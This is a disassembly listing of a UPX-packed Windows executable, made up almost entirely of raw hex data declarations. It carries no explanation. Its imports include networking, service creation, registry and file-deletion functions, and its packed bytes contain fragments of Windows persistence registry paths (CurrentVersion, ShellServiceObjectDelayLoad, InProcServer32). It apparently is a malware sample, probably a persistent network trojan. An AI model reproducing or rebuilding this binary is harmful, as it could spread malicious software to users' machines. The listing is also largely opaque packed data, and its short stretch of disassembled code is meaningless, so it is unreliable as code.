646E6148h, 656Ch, 47015500h, 69547465h, 6F436B63h dd 746E75h, 47015C00h, 65567465h, 6F697372h, 6Eh, 47016800h dd 61626F6Ch, 6464416Ch, 6D6F7441h, 41h, 49019200h, 7265746Eh dd 6B636F6Ch, 78456465h, 6E616863h, 6567h, 49019400h, 7265746Eh dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 4C01AD00h dd 6C61636Fh, 6F6C6C41h, 63h, 43003100h, 74616572h, 6C694665h dd 4165h, 5201FA00h, 46646165h, 656C69h, 52020E00h, 6E556C74h dd 646E6977h, 52020F00h, 655A6C74h, 654D6F72h, 79726F6Dh dd 53026400h, 7065656Ch, 6C02C600h, 63727473h, 416E7970h dd 6C02C900h, 6C727473h, 416E65h, 43004700h, 74616572h dd 72685465h, 646165h, 44005400h, 74656C65h, 6C694665h dd 4165h, 5300FE00h, 69547465h, 72656Dh, 52000200h, 73696765h dd 43726574h, 7373616Ch, 41h, 47002000h, 654D7465h, 67617373h dd 4165h, 54002400h, 736E6172h, 6574616Ch, 7373654Dh, 656761h dd 44002500h, 61707369h, 4D686374h, 61737365h, 416567h dd 50003D00h, 5174736Fh, 4D746975h, 61737365h, 6567h, 43004F00h dd 74616572h, 6E695765h, 45776F64h, 4178h, 44005100h, 72747365h dd 6957796Fh, 776F646Eh, 44005B00h, 69576665h, 776F646Eh dd 636F7250h, 41h, 4300BF00h, 65736F6Ch, 76726553h, 48656369h dd 6C646E61h, 65h, 4300C000h, 72746E6Fh, 65536C6Fh, 63697672h dd 65h, 4400C300h, 74656C65h, 72655365h, 65636976h, 4F00D100h dd 536E6570h, 6E614D43h, 72656761h, 41h, 4F00D300h, 536E6570h dd 69767265h, 416563h, 52016700h, 65446765h, 6574656Ch dd 756C6156h, 4165h, 52017100h, 72436765h, 65746165h, 4579654Bh dd 4178h, 52017400h, 6C436765h, 4B65736Fh, 7965h, 52017900h dd 704F6765h, 654B6E65h, 41784579h, 52018400h, 75516765h dd 56797265h, 65756C61h, 417845h, 52019000h, 65536765h dd 6C615674h, 78456575h, 41h, 5F00E800h, 616F7469h, 5F001800h dd 7465475Fh, 6E69614Dh, 73677241h, 5F018100h, 65656C73h dd 70h, 65020A00h, 746978h, 6D025400h, 70636D65h, 79h dd 6D025600h, 65736D65h, 74h, 72026000h, 65736961h, 72026100h dd 646E61h, 73026A00h, 616E6769h, 6Ch, 73026D00h, 6E697270h dd 6674h, 73026F00h, 646E6172h, 73027100h, 61637274h, 74h dd 73027200h, 68637274h, 72h, 73028000h, 74737274h, 72h dd 6F737700h, 32336B63h, 6C6C642Eh, 0Fh dup(40500000h) dd 4E495700h, 54454E49h, 4C4C442Eh, 40501400h, 45485300h dd 32334C4Ch, 4C4C442Eh, 40502800h, 52454B00h, 334C454Eh dd 4C442E32h, 4Ch, 15h dup(40503C00h), 45535500h, 2E323352h dd 4C4C44h, 9 dup(40505000h), 56444100h, 33495041h, 4C442E32h dd 4Ch, 0Bh dup(40506400h), 54524300h, 2E4C4C44h, 4C4C44h dd 0Eh dup(40507800h), 25h dup(0) dd 2000h, 0 dd 2000h, 100000h, 2A0000h, 300000h, 480000h, 0 dword_420004 dd 0 ; sub_402CB2+1Dr ... dword_420008 dd 0 dword_42000C dd 0 ; sub_404211:loc_404234r ... dword_420010 dd 0 ; sub_40414B+11r ... dword_420014 dd 0FFFFh ; sub_404211+B9r ... dword_420018 dd 1 ; sub_404F53+Co byte_42001C db 0 ; DATA XREF: sub_404DE5+7r align 2 word_42001E dw 0FFFFh ; DATA XREF: sub_404ED7+5o dd 4F2AFFFFh, 4F350040h db 40h, 0 word_42002A dw 5A4Dh ; DATA XREF: sub_40523F:loc_405299o dd 30090h, 40000h, 0FFFF0000h, 0B80000h, 0 dd 400000h, 8 dup(0) dd 0C80000h, 1F0E0000h, 0B4000EBAh, 0B821CD09h, 21CD4C01h dd 73696854h, 6F727020h, 6D617267h, 6E616320h, 20746F6Eh dd 72206562h, 69206E75h, 4F44206Eh, 6F6D2053h, 0D2E6564h dd 240A0Dh, 13h dup(0) dd 45500000h, 14C0000h, 88F20003h, 41CAh, 0 dd 0E00000h, 10B010Fh, 40000006h, 10000000h, 50000000h dd 98200000h, 60000000h, 0A0000000h, 0 dd 10000040h, 2000000h, 40000h, 0 dd 40000h, 0 dd 0B0000000h, 10000000h, 0 dd 20000h, 0 dd 10000010h, 0 dd 10000010h, 0 dd 100000h, 2 dup(0) dd 0A0000000h, 0D80000h, 1Ch dup(0) dd 50550000h, 3058h, 50000000h, 10000000h, 0 dd 4000000h, 3 dup(0) dd 800000h, 5055E000h, 3158h, 40000000h, 60000000h, 3A000000h dd 4000000h, 3 dup(0) dd 400000h, 5055E000h, 3258h, 10000000h, 0A0000000h, 2000000h dd 3E000000h, 3 dup(0) dd 400000h, 0C000h, 42h dup(0) db 0Ah align 2 aInfoThisFileIs db '$Info: This file is packed with the UPX executable packer http://' db 'upx.tsx.org $',0Ah,0 aIdUpx1_07Copyr db '$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Re' db 'served. $',0Ah,0 dw 5055h dd 90C2158h, 0A530902h, 0A837A262h, 72695F94h, 381F0000h dd 70000000h, 4260000h, 7EE93800h, 4D009208h, 300905Ah dd 3200043Bh, 0FFFFB2C8h, 0F97F40B8h, 4C8377Fh, 0EBA1F0Eh dd 0CD09B400h, 4C01B821h, 73696854h, 0FDBF7020h, 6F72FFFFh dd 6D617267h, 6E616320h, 20746F6Eh, 72206562h, 69206E75h dd 534F4402h, 50ED6D20h, 646FFF60h, 0D0D2E65h, 50C7240Ah dd 0DBED1345h, 14CFF21h, 888A0002h, 9DE041CAh, 6010B21h dd 7EE90F08h, 0E022B3h, 10E018A4h, 0F9257325h, 20B6366h dd 604501Eh, 0C96E676h, 710341Eh, 0F65E5920h, 29E0A006h dd 0B2017578h, 17C6FDDh, 4D3864D8h, 37903F76h, 7865742Eh dd 20A22B74h, 96CB6FFBh, 41A00EBh, 65722EE0h, 0CC636F6Ch dd 677BECA6h, 2623FB9Eh, 107942A2h, 3703D95h, 2CDB3034h dd 1226669Bh, 46E22FFAh, 9A691B30h, 0B423BAEh, 5E14032Ch dd 0CD34D36Eh, 562C4AB2h, 4D867062h, 9C4D34D3h, 0E2D4C2AEh dd 59AE9AF2h, 182D0836h, 463C0728h, 69A69A69h, 786C6254h dd 9A69B28Eh, 0C6B49EA6h, 4D2F02E2h, 0F4CDB9D3h, 3972E0Ah dd 344C3C24h, 5C34D34Dh, 9A8A7C6Ah, 0D34D34DBh, 0E6CEC0AAh dd 59BF2EF2h, 243BA776h, 0F4031087h, 69A6E42Bh, 0CAD4A69Ah dd 0BAACB6C0h, 0A29A6D60h, 0D72B9098h, 7B66B27Fh, 9603E9B6h dd 78132F8Ah, 0FF880330h, 66D217FFh, 4F538130h, 41575446h dd 4D5C4552h, 6F726369h, 0E5666F73h, 74FFFFFFh, 6E69575Ch dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h dd 0FB7F6853h, 536CDB6Fh, 6528760Ch, 656A624Fh, 10447463h dd 6F4C7961h, 0AD6E6461h, 39477015h, 6739082Bh, 0A5FF3F4Dh dd 0DB6C2006h, 72617041h, 6E656D74h, 0FA6E495Ch, 53035EDFh dd 33023B63h, 4C430032h, 5C444953h, 0E77ED923h, 257B00BBh dd 2D583830h, 0FA5D3404h, 7D0361DBh, 0FCEC8323h, 0F0E89090h dd 0DEF75706h, 60BAFBBh, 78453759h, 7C737469h, 6046DE82h dd 62694CFBh, 3B797172h, 656E686Bh, 0BF6ED76Ch, 5FB5DF67h dd 57791B54h, 7DF60FD5h, 0B565DBFBh, 50677562h, 6CC76972h dd 23656765h, 7850305Ch, 642E1ED7h, 50580F2Bh, 6F114F4Ch dd 33D5B737h, 21727270h, 2B6261C5h, 6F667364h, 62360DECh dd 732E126Fh, 35CBB79h, 0B835A0DDh, 5C214964h, 64723A5Dh dd 8FB10B7Fh, 5F74511Ah, 5CEC1F33h, 65704F5Fh, 0FE57B218h dd 4478566Eh, 706E6148h, 0B5AC006Eh, 2D4D37FFh, 4B59542Dh dd 46475157h, 0E0A4A48h, 0F9ED6113h, 4245411Fh, 48534159h dd 5B25464Ch, 7B096702h, 32020EFh, 30231205h, 0B0EF7BEEh dd 0B3A0F32h, 1E331504h, 7FFC8360h, 4A455767h, 4A464B57h dd 0AB414557h, 0FE9A13BBh, 5349444Eh, 1A034452h, 0A200FF97h dd 0CBCB901Fh, 1FA60B6Eh, 91218D0Fh, 0A4BCB921h, 31232319h dd 6D253525h, 0D97FD3h ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 57740150h push 24h dec ch imul ch adc eax, 8D1E112Ch inc ebp lock push eax or [eax], ebp movzx eax, word ptr [ebp-6] push eax mov esi, ds:74F3CF20h iret ; --------------------------------------------------------------------------- db 0Ah, 0FCh, 50h dd 0F6F8FE04h, 0FB9B66F4h, 858D50F7h, 0F0755B78h, 3826C068h dd 36CD10D6h, 0B017ECBBh, 14B468FEh, 0B76A0C4Fh, 4FB7F1Dh dd 0F9F75999h, 0C283DC5Fh, 2A505205h, 345DD60Ch, 73BDCC10h dd 38C4832Fh, 68502715h, 3B8129B0h, 5B7776DBh, 80A0BF8Fh dd 12285750h, 5214220Fh, 647736Eh, 373015A4h, 7D330876h dd 1766E6B0h, 6A2C310Bh, 0D8986809h, 0C9ECE761h, 28458830h dd 66FDDB9Fh, 7909372Fh, 68234068h, 77866E02h, 606C986Eh dd 0C95E5F12h, 0AEF22C3h, 18E11BEFh, 0A91D8B53h, 0FF336726h dd 0EFFC7D89h, 0FFFCFF0Ah, 10C083D3h, 312C8950h, 0F08BDC1Ch dd 0FF73B59h, 0EFDB2384h, 6A4937BAh, 3AE4680Ah, 21D1756h dd 468D056Ah, 0DFB7F00Fh, 0F817B16h, 0D3B41859h, 0F467640h dd 730FED6Ch, 570C1509h, 24122068h, 3FFB1475h, 0C73BDED9h dd 18090E75h, 0EB026A04h, 0F84D8D23h, 1337F351h, 111CB3DBh dd 5E2A2BF8h, 0C2105021h, 823B6EEDh, 5803FA08h, 840A13E9h dd 0DD77FB62h, 300068F7h, 4C2E5783h, 3BD88B1Fh, 687D74DFh dd 3AD95C14h, 10481BB7h, 0B70A0468h, 60440EF4h, 6ABFBB6Fh dd 58F88BF6h, 2B58F868h, 3F45AC3h, 0C28D16F8h, 89F1F4BFh dd 0CB2BC87Eh, 4689C103h, 7E22210Bh, 0E10DB86Eh, 23B05356h dd 33E81040h, 0EC6FEEF6h, 0F43C2DFh, 56535056h, 8C3C1656h dd 770974C6h, 9B8D17EEh, 0C710EB38h, 7EB0431h, 0ECDF3508h dd 1A250699h, 7D8B0711h, 6A1611Bh, 51615B60h, 0F605746h dd 66DF8E31h, 61FC96BBh, 0AF0F5424h, 0EB4A31Ch, 75FFFFDEh dd 0B907A121h, 35247621h, 7BFBC069h, 0C82B7F7Ch, 0C2126851h dd 2BD998EDh, 0D0F71D58h, 2D2474BFh, 0C7DCF6FBh, 155CC701h dd 500CA756h, 6BCC033h, 0CA1DD33h, 0A1609A6Bh, 1A3B6C5Dh dd 0D956D913h, 641A206Ah, 9D8DB438h, 0A2F0DE08h, 0B73816ECh dd 3019D866h, 0F8C3522Eh, 0DA1B6B02h, 0E10C7DBh, 106A1301h dd 0E9B3D537h, 14FCAD99h, 284BC610h, 0CD73A702h, 0FDD8780Dh dd 7C514104h, 7A799D23h, 13E01511h, 59B5E078h, 44CF1F92h dd 0DB541112h, 0ED372E9h, 83F08B74h, 3902F74h, 5B64D9E8h dd 0A0567832h, 9D351270h, 6C572119h, 1F5E681Bh, 8986EF8Dh dd 0DB33537Dh, 64405357h, 6FBDEE90h, 5B83E70Bh, 0BE566C74h dd 0BF6AA218h, 538C6667h, 890F087Fh, 575015B5h, 3FD2D3ECh dd 74C0858Ah, 67849F36h, 0E19939D6h, 74766CE6h, 84202613h dd 71E3EB15h, 5B359BE1h, 895BFC14h, 0FC6157D9h, 5E3FB067h dd 5B5FC38Bh, 5D8B048Dh, 53575608h, 0FDBEB7FEh, 3D66590Eh dd 3F76C88Bh, 3C80D144h, 0D745C1Ah, 0FF6DC181h, 151FAF6Fh dd 0EBEC77C9h, 3B664101h, 1B2373C8h, 0BE17FFC9h, 6DF002B4h dd 1778F12Bh, 8148DC5h, 1A148A47h, 61059488h, 6D7B6376h dd 7E6DC718h, 0C62F7AEBh, 90A618B7h, 245C644Ch, 0AF9D560Ch dd 57FFDDB7h, 10247C8Bh, 197EDB85h, 2EAB0A6Eh, 7D1A6AC0h dd 0FFFEE678h, 8861C280h, 3B463E14h, 80E77CF3h, 32001F24h dd 2C02109Fh, 8FFFF8ECh, 84D8B0Ch, 0D895648h, 777550BCh dd 237BF0C6h, 0A151930Bh, 536FF898h, 0B0B64F84h, 0FC1BDA0Bh dd 2404C711h, 7B01C75Ch, 59D676F6h, 2E7559D7h, 13546815h dd 0B37ECBF0h, 93B4E1Ah, 4080B27h, 0E1610CEBh, 68F1BDAFh dd 0A929193Ch, 505959E0h, 95F7C358h, 0CC27027h, 1703189Bh dd 0B3637289h, 6801FB3Dh, 0D1261294h, 3DA88F59h, 85BD95B7h dd 1FE934Fh, 0BF5D940Eh, 64C9C9ADh, 7B575D9Ch, 7C9DF8F0h dd 30BB6D93h, 9F6880A5h, 0B44EB1E1h, 0C0A359CDh, 0ACA43F00h dd 315F5F7Bh, 12353C7Ch, 960C7024h, 4505B36Eh, 0E564BFA0h dd 5A786657h, 6DB755A0h, 9B9C2613h, 5FDB93Dh, 0E8E6EBEBh dd 34680CFCh, 6CC7580Ah, 7B167716h, 2733756Ah, 5F17E15Dh dd 0E804F7E3h, 0E69FD8CDh, 0A2F18B76h, 0C79CFC18h, 41135006h dd 0E3998C65h, 196A1A1Dh, 0B60514C0h, 26108D66h, 1F20B710h dd 57816E74h, 257126Dh, 6F09B0C3h, 0D7611EB5h, 0B7518C8h dd 2DC05935h, 147E89FFh, 57571CEBh, 0AC470957h, 3EB799BEh dd 99741446h, 16012046h, 5FC68B1Ch, 0C6D77F68h, 6283568Dh dd 44F6420Fh, 20010824h, 11DB66D8h, 1D5920D6h, 3DA21B5Eh dd 0FB59BB6Fh, 9D5C8BEAh, 74037468h, 0DB768BD7h, 14ED95A3h dd 5609F685h, 752A6146h, 0B7F6FB7Fh, 0F03BDF1Ch, 718D0375h dd 8318515Bh, 392527FAh, 6752045h, 0FDB035B2h, 5104C183h dd 20D003EBh, 14021847h, 0D674B3F5h, 4552AF10h, 1CC25DB4h dd 0D8055EB6h, 7AC4B870h, 0E510E41Ah, 4FF42BEh, 20C46818h dd 896A9A7Ah, 0CED8C847h, 86A00E4h, 0D8C8CC18h, 0C4202BD8h dd 4C351016h, 0D03211D9h, 0B08D18D4h, 0B2C1A05h, 0D81B6914h dd 8E7C1D19h, 0A04514h, 565E5308h, 12CC170Ah, 4D61605Eh dd 660BB8FCh, 940AC604h, 83ABC040h, 0DDEDC0B3h, 21170BDh dd 0EA8B0575h, 12CB3CEBh, 0C187CD06h, 6810AFBCh, 1A8A53A4h dd 36276FCh, 3931EB76h, 0BA5D0C7Dh, 191E05D2h, 2EB17D0h dd 5BB81EE0h, 30F6DD6Bh, 8D00575Fh, 0DC91AE71h, 344AC57Eh dd 0E942189h, 6DAE08C2h, 0BF98F138h, 78570880h, 12DB098Eh dd 85E8BEFh, 2F0C331h, 74C3FDF4h, 7449205Ch, 0C7C82C14h dd 0A2659BA1h, 7AC4660Dh, 5C68DD4Ah, 4D6D46E2h, 510CEFE8h dd 63FFBA4Fh, 0FC26F135h, 0C01BD8F7h, 5FC2456h, 9B5071E4h dd 6FC5D483h, 0E59518A8h, 0B36AC503h, 0FFB191B7h, 753BC445h dd 93C0940Fh, 1F068FB6h, 4A3EF9D9h, 0B18BCC26h, 4D17DE35h dd 6895910h, 0CFA69106h, 0B986F977h, 8A040883h, 1010E04h dd 5D270C46h, 106D78FBh, 7AD518E7h, 534244C7h, 76398D9Dh dd 0F66AD943h, 57465945h, 0B2436206h, 3D06CB3Eh, 2B6DF6AAh dd 0B54CB46Ch, 89630CC9h, 4B565F01h, 5DDC6214h, 418B4C5Bh dd 0B455A420h, 314CDED6h, 3F6856E1h, 5D00A4CFh, 88661647h dd 5741415h, 336CEB67h, 0A6278CDCh, 1DA9AAh, 9C1B6332h dd 0F5E6803h, 2F6DB804h, 66602061h, 573B60Fh, 0BB648AFBh dd 9897785Eh, 1261C10Bh, 52135868h, 0FBC228D0h, 0A1642E21h dd 25896408h, 0C7CEA307h, 0D22CDDC6h, 0A5E86589h, 27240C29h dd 7BD757F4h, 30BBBB0h, 0F86850C3h, 0B76CC0Ah, 4014E4B4h dd 0E12E0F40h, 0B916D170h, 0AF3861E0h, 0A9522B34h, 6BFBF192h dd 9B6990B3h, 94DC1AFAh, 85930D9Bh, 4390A153h, 5B4F9493h dd 16F8B6EBh, 42392FE4h, 45F7DB08h, 0DA2DC0BFh, 7C5B3BC8h dd 201E7C80h, 44C60573h, 6FE25A6Dh, 0EB402E06h, 1F76FFE9h dd 0E0757546h, 86E1BC3h, 0E00381AEh, 0B9616480h, 3105BAB1h dd 4D450CCh, 0A6DDA60Ch, 1D5FA246h, 50DA1E08h, 0CF3CD804h dd 0D4D63CF3h, 9ED2CECCh, 46D979E7h, 746B60Ah, 6A040506h dd 18F9EF9Eh, 2040308h, 53B60601h, 6A716023h, 58859215h dd 0E8130340h, 98C95790h, 0BF723EC4h, 0C49A8598h, 50AE2350h dd 6B6F683Fh, 21D00ADCh, 59504208h, 623E3786h, 0C483D911h dd 0D20EEBFFh, 0C2BE1696h, 0C758BC3h, 0F185598Bh, 37D3D907h dd 0CF1CBEFAh, 0E07D83h, 160EE070h, 96841A46h, 0B4F072CCh dd 8A70F20Dh, 0D8FBCE71h, 0C9F0F468h, 0C8833811h, 0CDF6ABFFh dd 9FA17C2Ch, 3B0C55C0h, 0D7992D6h, 0B42E9EA5h, 1DE677FCh dd 7AF286E4h, 0BB4BFFFFh, 0CE8B135Eh, 0CA3BDCA6h, 48A2973h dd 0C0458839h, 972303Ch dd 1D73393Ch, 7D778F4Dh, 0D6AC0F8h, 74B84B0Ah, 8BE4797Fh dd 6EBD8F1h, 0FD0EB41h, 28850F39h, 0BD1FEDBCh, 3BF64A8Dh dd 5C1548F1h, 0DFFFFD73h, 8D0088D1h, 0C13B144Eh, 0C23B2A7Dh dd 0C8A2673h, 0BC4D8838h, 9A2DF980h, 0A53B6B1h, 0C9595404h dd 37DBDB77h, 253075DBh, 65830409h, 391000D4h, 0AFA0D44Dh dd 76DED966h, 3B568DBFh, 8A1F75C2h, 0D8E8B838h, 80C9A78h dd 43A41905h, 0D8CC36C1h, 0D4ADF8D6h, 5181802Eh, 3C62D0F6h dd 8D0B0211h, 77770CD0h, 8D020FD8h, 1B503E04h, 3E440E02h dd 639E0F02h, 46D0498Ch, 5C1180D3h, 8D00AD8h, 83C40B12h dd 37B704C8h, 5C24AEEh, 0C40A7F32h, 4057C01h, 895D7E0Ch dd 0A1A06237h, 6E31043Eh, 5AD40506h, 7530E6ECh, 74310607h dd 30032C18h, 97AD1B0Bh, 6846D709h, 6D4A10D8h, 921418BBh dd 0EA76E00Ah, 30A10B84h, 0C3C3C588h, 0E4239098h, 9CDB5878h dd 0C5691967h, 5DB3D35Dh, 3C80FDB0h, 662E9EBFh, 2F4F048Bh dd 7E10F2A0h, 0D7C35B9h, 0E33A097Fh, 0C33BC475h, 5321C972h dd 61505BCBh, 2E5335BBh, 470C572Ah, 7EC59C62h, 7CB2BF08h dd 75EB590Eh, 75CB3BC9h, 2CB0D332h, 5D5D974Ch, 0B34DEFC6h dd 753DBF74h, 98479124h, 0B1640C10h, 9DCB3043h, 0C26F3394h dd 0CBBBC3E9h, 0BE4C5306h, 1966900Bh, 4CACC84h, 5FF2C477h dd 770465C2h, 0C483DA04h, 6A535330h, 0DF074C0Ah, 0FF0CACD6h dd 20AB5325h, 0CE46497Ah, 27CCB815h, 0D91BD9AFh, 1EA8E4AAh dd 9037D90Ch, 0A48D91h, 0F3A3A8A8h, 66F1A36Fh, 857C83h dd 300A0710h, 304B0875h, 310CEC3Ch, 9E0F75BEh, 11C847FFh dd 885216C8h, 394AE60h, 6EB7FA26h, 5CFD4B46h, 6212ECEBh dd 57C33DC8h, 0C58B7D68h, 6177E80h, 0CE6D423Ah, 196D866Dh dd 0F51A1CA5h, 29C11E05h, 936CD263h, 24D00C22h, 0D6FABE8h dd 2B365EFEh, 9B3003F3h, 56EED1B8h, 6DAFC116h, 0C60E16F0h dd 140A0DFFh, 0B472B54Ah, 6F202A2Ah, 50B33709h, 903722A8h dd 11740BF0h, 28D1BF6Eh, 2B990F39h, 0EF8D1C2h, 56B1027Eh dd 0F923EB63h, 0AB2C0D33h, 0D1CB7615h, 0F9D10F6Fh, 5F70818Dh dd 66057E27h, 0E9A17FB7h, 0AC16EBACh, 3B0279FEh, 4173B87Dh dd 2D2BB8F8h, 0EC1342F6h, 1F04AD90h, 2D726750h, 3DBC4B6h dd 0D19015F7h, 55C7D8E8h, 0F336DB19h, 165543A3h, 6F470B0Eh dd 1EDF647Dh, 3BF07FFFh, 8D067CF7h, 0BAEB017Eh, 0A4C7814Fh dd 0FE3BA6E2h, 0FC1E0473h, 0F78BD5B6h, 0FC5F4EACh, 0AC752B00h dd 90A17622h, 24A30Ch, 0A6040789h, 0A4FB5CD9h, 0F5044789h dd 0C80807F9h, 528512B4h, 98A7A9CBh, 1A3721C0h, 1047322Bh dd 0BA10B110h, 0C7448E95h, 0D527A1A5h, 4582AA32h, 186E401Dh dd 3C609436h, 48689757h, 76192BB5h, 15B8A05Bh, 9E9C980Eh dd 0E9518E0Ch, 0C73E9193h, 0E05DCE35h, 1E142A2Eh, 46110B74h dd 5BF86A6Eh, 9A04850Bh, 0B88C8B5Ah, 0CA532084h, 5B1F77B9h dd 0DC24D771h, 1AE85589h, 4BD3C8Dh, 69AD7E17h, 72B43C9h dd 0A4028DA0h, 0D49F1B10h, 0F5608501h, 0FEBB0300h, 0E0358605h dd 0F9B86857h, 85731345h, 0B80ECC30h, 893E4816h, 0EC18DB59h dd 62853913h, 0A441AFA2h, 0ACEA01A3h, 72696BE0h, 0FF646F7Fh dd 4E5D0734h, 12C540BBh, 0CD9B82A0h, 97314A95h, 50271068h dd 39CE84ECh, 0CDE98C4h, 0EE721183h, 7A3D8BA5h, 0A0B912FEh dd 52C5A8DBh, 0AC017CC0h, 0DBFB7B1Bh, 18397517h, 0B37EBE5h dd 0D01C8DE0h, 0F65C6C51h, 110319B0h, 0F2001BEh, 0B1DBFD7Bh dd 1B06282Bh, 151ABD6Fh, 0B5FFCC38h, 99F9A3C4h, 0CCD04DCDh dd 8C0E1863h, 0B0DDDBBh, 84EB711Eh, 0D31B30CBh, 9D90D868h dd 75B8B9ECh, 4B4F9969h, 13261098h, 80535306h, 404C244Fh dd 6A91EB4Eh, 1304B764h, 87EB5F47h, 8C6439Ch, 0DB86C20h dd 0ABBAE88Ch, 6A4263C7h, 0D72F5D34h, 0C6C70C11h, 6359F460h dd 0B2C87DAFh, 0B8500460h, 91223F0h, 8C1911ECh, 0EEC86154h dd 8359C80Bh, 4D8351C7h, 60C07CC8h, 5778EBF1h, 45F1C28h dd 5AF08EC6h, 0AC0B1B6Bh, 4C330E8Bh, 9899DAB7h, 213976D0h dd 51A6C8B5h, 24CFB833h, 0A2893E89h, 4420FCBBh, 527DB884h dd 84AF6425h, 477E97D6h, 0C208C683h, 5ECF72F0h, 0CC0400A7h dd 5F78D81Dh, 0D574C4C7h, 0AE075328h, 0D1350CBFh, 280F474Ch dd 666A9F11h, 138B67E8h, 25FF2C11h, 91054808h, 4C8C8E7h dd 0F410F800h, 919AC16Ch, 0CCECF0h, 0EC27E819h, 0DCE08C8Ch dd 0F33D5100h, 767D1BF6h, 7208F58Dh, 87E98114h, 162D662Dh dd 85EC7F6Fh, 0EC731701h, 0C48BC82Bh, 8BE18B0Ch, 0B748C8F1h dd 0C33140C1h, 8C88804Fh, 8CC8869Fh, 60B8E999h, 0C96F6029h dd 3A1D77C9h, 88C813h, 0F4F7284Ah, 19930520h, 7E1680E1h dd 0D03DCC39h, 271B34F7h, 6F5085A8h, 0DF1B4820h, 0D97972Eh dd 2C32132Bh, 2A7410DCh, 4BCB3580h, 6C1C2F7Ch, 0CB203A27h dd 142FD6E5h, 30585811h, 0AC765CDAh, 132B805Fh, 0E8112898h dd 578C2089h, 9F7202A6h, 0E6B5BFE5h, 6D029709h, 70636D65h dd 65739979h, 97FCB3B9h, 7302BE74h, 656C7274h, 0C302C56Eh dd 6BCFDD3Bh, 1D616309h, 0D3A631BAh, 3F7FB76Ch, 5940333Fh dd 2505841h, 0F0F5A40h, 0F837FD32h, 0F490E3Ah, 7865AACAh dd 74706563h, 6EDD685Fh, 725243D1h, 43023DC1h, 0ADB3696Fh dd 491BB2FDh, 7878435Fh, 48758546h, 0DEA3781Dh, 4513AF0Ah dd 6C825F48h, 0BD42676Fh, 0D0310B41h, 7B545243h, 3DB67D9Ch dd 14E4957h, 38F0C45h, 0B6418A6Ch, 7933DEE0h, 240BAA0Bh dd 76A83743h, 0BDBFB542h, 54600D60h, 7474DEDBh, 6FD35265h dd 0B7BA8105h, 37FFDB6h, 0E697257h, 73966250h, 721B4D73h dd 0EED7FB9Bh, 470189C7h, 644113F6h, 11177264h, 0A5D82E67h dd 6C75213Ah, 0D8095F4Fh, 356FFDAh, 74726956h, 416C6175h dd 84452A84h, 751CC10Ah, 4C310261h, 0EA9BB535h, 695433FFh dd 6F436B63h, 2074E75h, 86B60649h, 2BD5AEEDh, 2E64656Bh dd 97670363h, 0C04AEB57h, 50754D41h, 930F6555h, 0A1364DEAh dd 0DAD1452Fh, 5961FDFEh, 6C5F0388h, 0F500DB63h, 461D5302h dd 0A56DBC80h, 0D6D6710h, 9E47014Fh, 8BDD70E0h, 0B8F6F25h dd 0D5797021h, 0A66BF6B6h, 0F795323h, 1EBE44EBh, 0C5AE6ECh dd 27316F1h, 4E32335Bh, 26B2BB6h, 497530D7h, 0E6C8718Ch dd 6525CB68h, 0DF68AD06h, 6F70AA96h, 1870B0A3h, 70616E53h dd 46DD6B61h, 0D51B6F28h, 1E627F43h, 82DB784Bh, 6D654144h dd 0BB4645DBh, 4EA57C33h, 32915EAh, 37140B53h, 0EC16D8h dd 6E1A2FDAh, 0F92FD230h, 0D5AACD86h, 0C85AC3ACh, 4CF2DAD6h dd 11A04561h, 66F74685h, 76453B9Dh, 0F4A1FAEh, 0C2B46064h dd 7F7AAEh, 49FB6544h, 671E886Fh, 4C76D6D5h, 1F31E500h dd 80007965h, 2ED56137h, 5DC88702h, 13868D96h, 6592453Ch dd 4466123h, 68D80160h, 426C2553h, 0F8D4CF75h, 4902A900h dd 2DEB721Ch, 0AD6C735Bh, 430A7043h, 53C2694Ch, 7386C9BDh dd 765F3D21h, 4B08C288h, 9F79D528h, 0F436BBF1h, 0FF501C68h dd 45007D18h, 0F6532EDBh, 69694508h, 9F685C64h, 428DB76Ah dd 146C2767h, 0CA267942h, 55D1CE6Eh, 6927284Fh, 330787Ah dd 9B556309h, 6AB00F45h, 0F8DFE9h, 3C52454Bh, 5D0BC74Ch dd 2D870A9h, 6682635Dh, 0C2187B71h, 0FC80258Ch, 0E9C371D6h dd 65061789h, 64D07267h dd 3B36ED25h, 0E3007Ch, 553F0CAFh, 76B65A53h, 1C5761E1h dd 756AF900h, 0B06BB3EEh, 149C009Dh, 17D73B7h, 0ADC936C3h dd 7075126Fh, 0A7759656h, 6901621Eh, 343D01A8h, 16F0528Bh dd 0C620D48Eh, 0F8A9654Bh, 4336440Dh, 9A3034CCh, 0D6D8CC1Fh dd 20EC3BDFh, 56444112h, 4B83496Fh, 25617942h, 27556F43h dd 67856C11h, 47300F66h, 390F5475h, 0D6036B0Dh, 916F1F49h dd 5160AE3Ch, 0FFCE0084h, 3F50DFD6h, 60335C33h, 3A336C33h dd 3380337Ch, 0FF90338Ch, 33FF06FFh, 33B933AFh, 1BEB33C4h dd 22340934h, 53343134h, 79345A34h, 0FF348434h, 0A8FFFFFFh dd 0CC34BB34h, 634F634h, 31352B35h, 4E353B35h, 7D355D35h dd 8E358835h, 9D359335h, 0FF35A735h, 0B4FFFFFFh, 0EA35D335h dd 1035F535h, 40363536h, 5B364836h, 66366136h, 90367736h dd 0AB369736h, 0FF36B236h, 0C2FFFFFFh, 0E636D136h, 18370436h dd 2A372337h, 53373937h, 6F376837h, 0F237C237h, 6937F937h dd 5638B738h, 0CCFFFFFFh, 0EB38DE38h, 2938FF38h, 5C395039h dd 94398039h, 0A5399A39h, 0A539B839h, 0FFFFFFFFh, 39CB39C5h dd 39D839D2h, 39E539E0h, 3A0D39F8h, 3A4F3A48h, 3A923A84h dd 3AE43AA5h, 0FF3F3AEDh, 3BF16FFFh, 0E273C12h, 3F3C383Ch dd 0A33C5E3Ch, 0BE3CB13Ch, 43CF23Ch, 0FF3DC73Dh, 0E5FFFFFFh dd 133DF53Dh, 343E183Eh, 793E3A3Eh, 983E7F3Eh, 503EE93Eh dd 643F573Fh, 7B3F6B3Fh, 3F3F863Fh, 98FFC34Ah, 0D13FCB3Fh dd 0F13FEC3Fh, 73200F3Fh, 0FFFE302Ah, 31B0FFFFh, 330A31B5h dd 332A3320h, 33B03337h, 355333B5h, 36153566h, 3633362Ch dd 3657364Ah, 0FFFFFFDCh, 36ECC3EFh, 37B43758h, 37F437C8h dd 383637FAh, 38473840h, 38873859h, 38A03899h, 0BFFF38A6h dd 38ACFFFBh, 38B838B2h, 38C438BEh, 0D1D838D2h, 39283922h dd 393D392Eh, 